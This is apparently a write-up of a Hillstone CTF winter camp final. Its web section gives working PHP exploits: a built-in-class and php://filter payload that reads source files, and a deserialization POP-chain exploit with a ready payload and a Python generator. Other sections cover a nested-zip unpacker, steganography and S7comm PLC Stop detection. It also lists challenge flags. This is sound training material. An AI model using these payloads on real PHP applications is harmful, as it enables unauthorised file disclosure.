Writeup for the 2nd Hillstone (山石) CTF Winter Camp final

Contents

web

Primitive php

misc

extract

Sign-in challenge

Alien radio waves~

Crypto

daobudao

ICS traffic analysis

S7_analysis

Daily emo


web

Primitive php

Challenge source:

<?php
highlight_file(__FILE__);
//hint.php
foreach ($_GET as $value) {
    if(preg_match("/flag/",$value)){
        die("不可以看flag啦,阿sir");
    }

}
$a = new $_GET['class1']($_GET['a']);$b = new $_GET['class2']($_GET['b']);
if ($a !== $b and md5($a)===md5($b))
{
    echo new $_GET['class3']($_GET['c']);
}

Bypass with PHP built-in classes. Reference: php中关于一些$a($b)_Msaerati的博客-CSDN博客_php new $a($b)

The check `$a !== $b and md5($a) === md5($b)` is satisfied with two `Exception` objects: they are distinct objects, so `!==` holds, but `Exception::__toString()` renders the message together with the file, line and stack trace, and because both `new` calls sit on the same source line with the same message the two strings, and therefore their md5 hashes, are identical. (The `<script>` text in the payload is only the message; any string works as long as both copies match.)

Attempts to turn the built-in classes into RCE and read the flag directly went nowhere (the loop rejects any GET value containing `flag`, so `flag.php` cannot even be named there), so read hint.php instead through a stream wrapper: `echo new SplFileObject(...)` prints the first line of the file, and `php://filter/convert.base64-encode` folds the whole file into one newline-free line, so the complete source comes back base64-encoded.

payload:

?class2=Exception&b=<script>alert('1')</script>&class1=Exception&a=<script>alert('1')</script>&class3=SplFileObject&c=php://filter/convert.base64-encode/resource=hint.php

Base64-decode the output to obtain hint.php:

<?php
echo "no hint";
class blue
{
    public $b1;
    public $b2;

    function eval() {
        echo new $this->b1($this->b2);
    }

    public function __invoke()
    {
        $this->b1->blue();
    }
}

class red
{
    public $r1;

    public function __destruct()
    {
        echo $this->r1 . '0xff0000';
    }

    public function execute()
    {
        ($this->r1)();
    }

    public function __call($a, $b)
    {
        echo $this->r1->getFlag();
    }

}

class white
{
    public $w;

    public function __toString()
    {
        $this->w->execute();
        return 'hello';
    }
}
class color
{
    public $c1;

    public function execute()
    {
        ($this->c1)();
    }

    public function getFlag()
    {
        echo file_get_contents($this->c1);
    }

}

unserialize($_POST['cmd']);

Build the deserialization payload, a POP chain through the classes in hint.php. The entry point is `red::__destruct`, which runs as soon as the unserialized object is discarded:

red::__destruct echoes `$this->r1 . '0xff0000'`, so r1 is a white object and its __toString runs;
white::__toString calls `$this->w->execute()`, so w is a color;
color::execute calls `($this->c1)()`, so c1 is a blue, whose __invoke runs;
blue::__invoke calls `$this->b1->blue()`; b1 is a red, which has no blue() method, so red::__call runs;
red::__call echoes `$this->r1->getFlag()`, so that r1 is a color;
color::getFlag runs `file_get_contents($this->c1)`, so that c1 holds the wrapper.

Reference:

[DASCTF 2022]三月赛 web 复现_das三月赛web_Snakin_ya的博客-CSDN博客

The wrapper that reads the flag is php://filter/convert.base64-encode/resource=flag.php; it travels in the POST body, which the `flag` filter on $_GET never inspects.

exp:

<?php
class blue
{
    public $b1;
    public $b2;

    public function __construct($b1)
    {
        $this->b1 = $b1;
    }
}

class red
{
    public $r1;

    public function __construct($r1)
    {
        $this->r1 = $r1;
    }
}

class white
{
    public $w;

    public function __construct($w)
    {
        $this->w = $w;
    }
}
class color
{
    public $c1;

    public function __construct($c1)
    {
        $this->c1 = $c1;
    }

}
$f = new color("php://filter/convert.base64-encode/resource=flag.php"); // color::getFlag reads this
$e = new red($f);     // red::__call -> $r1->getFlag()
$d = new blue($e);    // blue::__invoke -> $b1->blue() (undefined, so __call)
$c = new color($d);   // color::execute -> ($c1)()
$b = new white($c);   // white::__toString -> $w->execute()
$a = new red($b);     // red::__destruct -> echo $r1 . '0xff0000'
echo (urlencode(serialize($a)));

POST the output as the `cmd` parameter to hint.php, whose top level calls unserialize($_POST['cmd']).

payload:

cmd=O%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22white%22%3A1%3A%7Bs%3A1%3A%22w%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A4%3A%22blue%22%3A2%3A%7Bs%3A2%3A%22b1%22%3BO%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7Ds%3A2%3A%22b2%22%3BN%3B%7D%7D%7D%7D
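
As an added example that is not part of the original writeup, the same chain generated from Python, which is convenient when no PHP interpreter is at hand: a minimal serializer that mirrors PHP's serialize() format for objects with public properties, plus urlencoding the way PHP's urlencode() does it. The class and property names are the ones from hint.php; the PHPObject helper and the restriction to the value types the chain needs (null, bool, int, string, object) are this example's own choices.

```python
from urllib.parse import quote_plus

FLAG_RESOURCE = "php://filter/convert.base64-encode/resource=flag.php"


class PHPObject:
    """A PHP object with public properties only, kept in declaration order."""

    def __init__(self, cls: str, **props):
        self.cls = cls
        self.props = props


def php_serialize(value) -> str:
    """Mirror PHP serialize() for null, bool, int, str and public-property objects."""
    if value is None:
        return "N;"
    if isinstance(value, bool):          # bool before int: bool is a subclass of int
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        # PHP counts bytes, not characters; a wrong length makes unserialize() fail.
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, PHPObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return f'O:{len(value.cls)}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(value).__name__}")


def gadget_chain(resource: str) -> PHPObject:
    """The hint.php gadget chain, innermost object first (trigger order runs bottom-up)."""
    leaf = PHPObject("color", c1=resource)           # color::getFlag   -> file_get_contents($c1)
    caller = PHPObject("red", r1=leaf)                # red::__call      -> $r1->getFlag()
    invoker = PHPObject("blue", b1=caller, b2=None)   # blue::__invoke   -> $b1->blue() (undefined => __call)
    executor = PHPObject("color", c1=invoker)         # color::execute   -> ($c1)()  (=> __invoke)
    stringer = PHPObject("white", w=executor)         # white::__toString -> $w->execute()
    return PHPObject("red", r1=stringer)              # red::__destruct  -> echo $r1 . '0xff0000'


def payload_for(resource: str) -> str:
    """POST body, percent-encoded like PHP urlencode() (same output here: no '~' or spaces occur)."""
    return "cmd=" + quote_plus(php_serialize(gadget_chain(resource)), safe="")


if __name__ == "__main__":
    print(php_serialize(gadget_chain(FLAG_RESOURCE)))
    print(payload_for(FLAG_RESOURCE))
```

The serialized form is length-prefixed, so there is no quoting to worry about; the one thing that silently breaks a hand-edited payload is a string length that no longer matches its bytes, which is why the serializer computes it from the encoded bytes.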

HSNCTF{537C532E-408B-FDCD-3E49-58E6FB578579}

misc

extract

Decode with the tool cloakify (its decloakify.py recovers the hidden file).

On Kali:

Open the saved file.

Change its extension to .zip.

It is a zip matryoshka: each layer holds the next archive, named one lower (f2331.zip holds f2330.zip, and so on down to f1.zip).

Script:

import zipfile

# The outermost archive is f2331.zip; each layer holds the next one, numbered one lower.
count = 2331
while count > 0:
    path = 'f' + str(count) + '.zip'
    with zipfile.ZipFile(path) as zip_file:
        # Each layer has a single member, the next archive; extract it into the current directory.
        zip_file.extractall('.')
    count -= 1

Result:

hsnctf{66eec912-e9ce-4e1d-ac54-ecea075dcb96}
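
The loop above hardcodes the depth (2331) and the f<N>.zip naming. As an added example, not from the original writeup, here is a version that decides by the zip magic bytes whether to keep unwrapping, extracts exactly one member per layer, and refuses member names that would escape the output directory. The chain produced by build_chain is constructed test data shaped like the challenge (f5.zip holds f4.zip ... f1.zip holds flag.txt); SAMPLE_FLAG is a placeholder, not the real flag.

```python
import io
import os
import tempfile
import zipfile

ZIP_MAGIC = b"PK\x03\x04"
SAMPLE_FLAG = b"hsnctf{sample_flag_for_test}"   # constructed placeholder, not the challenge flag


def is_zip(path: str) -> bool:
    """Decide by magic bytes, not by extension: inner layers may carry any file name."""
    with open(path, "rb") as fh:
        return fh.read(4) == ZIP_MAGIC


def unwrap_nested_zip(path: str, out_dir: str, max_depth: int = 100000):
    """Follow a chain of single-member archives until the extracted member is no longer a zip.

    Returns (path of the innermost file, number of layers opened).
    """
    current, depth = path, 0
    while depth < max_depth and is_zip(current):
        with zipfile.ZipFile(current) as zf:
            names = zf.namelist()
            if len(names) != 1:
                raise ValueError(f"{current}: expected one member, found {names}")
            member = names[0]
            # Refuse zip-slip style names before writing anything to disk.
            parts = member.replace("\\", "/").split("/")
            if member.startswith(("/", "\\")) or ".." in parts:
                raise ValueError(f"{current}: unsafe member name {member!r}")
            zf.extract(member, out_dir)
        current = os.path.join(out_dir, member)
        depth += 1
    return current, depth


def build_chain(out_dir: str, depth: int, payload: bytes = SAMPLE_FLAG) -> str:
    """Constructed test data: f{depth}.zip > ... > f1.zip > flag.txt, like the challenge layout."""
    data, name = payload, "flag.txt"
    for i in range(1, depth + 1):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr(name, data)
        data, name = buf.getvalue(), f"f{i}.zip"
    top = os.path.join(out_dir, name)
    with open(top, "wb") as fh:
        fh.write(data)
    return top


def demo(depth: int = 5):
    """Build a chain in a temp dir, unwrap it, and return (layers, innermost name, content)."""
    with tempfile.TemporaryDirectory() as tmp:
        top = build_chain(tmp, depth)
        final, layers = unwrap_nested_zip(top, tmp)
        with open(final, "rb") as fh:
            return layers, os.path.basename(final), fh.read()


if __name__ == "__main__":
    print(demo())
```

For the challenge itself the call is `unwrap_nested_zip("f2331.zip", ".")`; the returned path is the innermost file and the depth tells you how many layers there really were, which is the check you want before trusting a hardcoded count.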

Sign-in challenge

hsnctf{welcome_to_hsnctf}

Alien radio waves~

The zip file's data is base64-encoded; decode it.

This yields a password-protected archive.

NTFS data stream, encrypted (alternate data streams show up with `dir /r` on Windows).

That gives an audio file; export it and decode it with SSTV (slow-scan television).

Extract the archive to get the flag.

hsnctf{70995fb0-eb60-0787-f305-77066aeb6730}

Crypto

daobudao

hsnctf{g00d_luck_have_fun}

ICS traffic analysis

S7_analysis

Browsing the S7comm packets turns up a PLC Stop request.

hsnctf{399}
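
The capture is not on the page, so as an added example that is not part of the original writeup, the following Python parses the TPKT / COTP / S7comm framing of a raw TCP payload and flags PLC Stop jobs (S7comm function code 0x29, the request a client sends to halt the CPU). The three frames are constructed by hand for this example, not taken from the challenge pcap; the function-code table covers the common Job/Ack_Data functions and leaves Userdata PDUs undecoded.

```python
import struct

# Function codes in the S7comm parameter header of Job / Ack_Data PDUs.
S7_FUNCTIONS = {
    0x00: "CPU services", 0x04: "Read Var", 0x05: "Write Var",
    0x1A: "Request download", 0x1B: "Download block", 0x1C: "Download ended",
    0x1D: "Start upload", 0x1E: "Upload", 0x1F: "End upload",
    0x28: "PLC Control", 0x29: "PLC Stop", 0xF0: "Setup communication",
}
ROSCTR = {0x01: "Job", 0x02: "Ack", 0x03: "Ack_Data", 0x07: "Userdata"}


def parse_s7(payload: bytes) -> dict:
    """Parse one TCP payload carrying TPKT / COTP DT / S7comm and summarise the S7 PDU."""
    if len(payload) < 7 or payload[0] != 0x03:
        raise ValueError("no TPKT header")
    (tpkt_len,) = struct.unpack(">H", payload[2:4])
    if tpkt_len != len(payload):
        raise ValueError(f"TPKT length {tpkt_len} != payload length {len(payload)}")
    cotp_li, cotp_type = payload[4], payload[5]
    if cotp_type != 0xF0:
        raise ValueError("COTP PDU is not DT (0xF0), no S7 PDU inside")
    s7 = payload[5 + cotp_li:]          # LI counts the COTP header bytes after itself
    if len(s7) < 10 or s7[0] != 0x32:
        raise ValueError("no S7comm protocol id 0x32")
    rosctr = s7[1]
    pdu_ref, param_len, data_len = struct.unpack(">HHH", s7[4:10])
    # Ack and Ack_Data headers carry two extra bytes: error class and error code.
    hdr_len = 12 if rosctr in (0x02, 0x03) else 10
    info = {"rosctr": ROSCTR.get(rosctr, f"0x{rosctr:02x}"), "pdu_ref": pdu_ref}
    if hdr_len == 12:
        info["error"] = (s7[10], s7[11])
    param = s7[hdr_len:hdr_len + param_len]
    if rosctr == 0x07 or not param:
        info["function"] = None          # Userdata parameters use a different layout
        return info
    func = param[0]
    info["function"] = S7_FUNCTIONS.get(func, f"0x{func:02x}")
    if func == 0x29 and len(param) >= 7:
        # PLC Stop: function, 5 unknown bytes, 1-byte PI-service length, PI service name.
        n = param[6]
        info["pi_service"] = param[7:7 + n].decode("ascii", "replace")
    elif func == 0x28 and len(param) >= 10:
        # PLC Control: function, 7 unknown bytes, 2-byte parameter block length,
        # the block itself, then 1-byte PI-service length and the PI service name.
        (blk_len,) = struct.unpack(">H", param[8:10])
        pos = 10 + blk_len
        if pos < len(param):
            n = param[pos]
            info["pi_service"] = param[pos + 1:pos + 1 + n].decode("ascii", "replace")
    return info


def find_plc_stops(frames):
    """Return the frame numbers whose payload is a PLC Stop Job."""
    hits = []
    for frame_no, payload in frames:
        try:
            info = parse_s7(payload)
        except ValueError:
            continue                      # not S7comm (or truncated); skip it
        if info["rosctr"] == "Job" and info["function"] == "PLC Stop":
            hits.append(frame_no)
    return hits


# Constructed sample frames (frame number, raw TCP payload); not from the challenge pcap.
READ_VAR_JOB = bytes.fromhex(
    "0300001f"                           # TPKT: version 3, length 31
    "02f080"                             # COTP: LI 2, DT, last data unit
    "3201 0000 000d 000e 0000"           # S7: Job, ref 13, param len 14, data len 0
    "0401 120a1002 0001 0001 84 000000"  # Read Var, 1 item: S7ANY, BYTE x1, DB1, area DB, addr 0
)
PLC_STOP_JOB = bytes.fromhex(
    "03000021"
    "02f080"
    "3201 0000 000c 0010 0000"           # Job, ref 12, param len 16
    "29 0000000000 09 505f50524f4752414d"  # PLC Stop, 5 unknown, len 9, "P_PROGRAM"
)
PLC_STOP_ACK = bytes.fromhex(
    "03000014"
    "02f080"
    "3203 0000 000c 0001 0000 0000"      # Ack_Data, ref 12, param len 1, error class/code 0/0
    "29"
)
CAPTURE = [(1, READ_VAR_JOB), (2, PLC_STOP_JOB), (3, PLC_STOP_ACK)]

if __name__ == "__main__":
    for no, pl in CAPTURE:
        print(no, parse_s7(pl))
    print("PLC Stop jobs in frames:", find_plc_stops(CAPTURE))
```

In Wireshark the same packets are found with the display filter `s7comm.param.func == 0x29`; the parser is for when you want to sweep many captures from a script, feeding it the TCP payloads of port 102 traffic. Matching the Job against its Ack_Data by `pdu_ref` (12 in the sample) tells you whether the PLC actually acknowledged the stop.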

Simp diary

Babe, I just got out of the shower. The water heater seems to be broken, the water kept going hot and cold, and it suddenly made me think of you, because you blow hot and cold with me too.
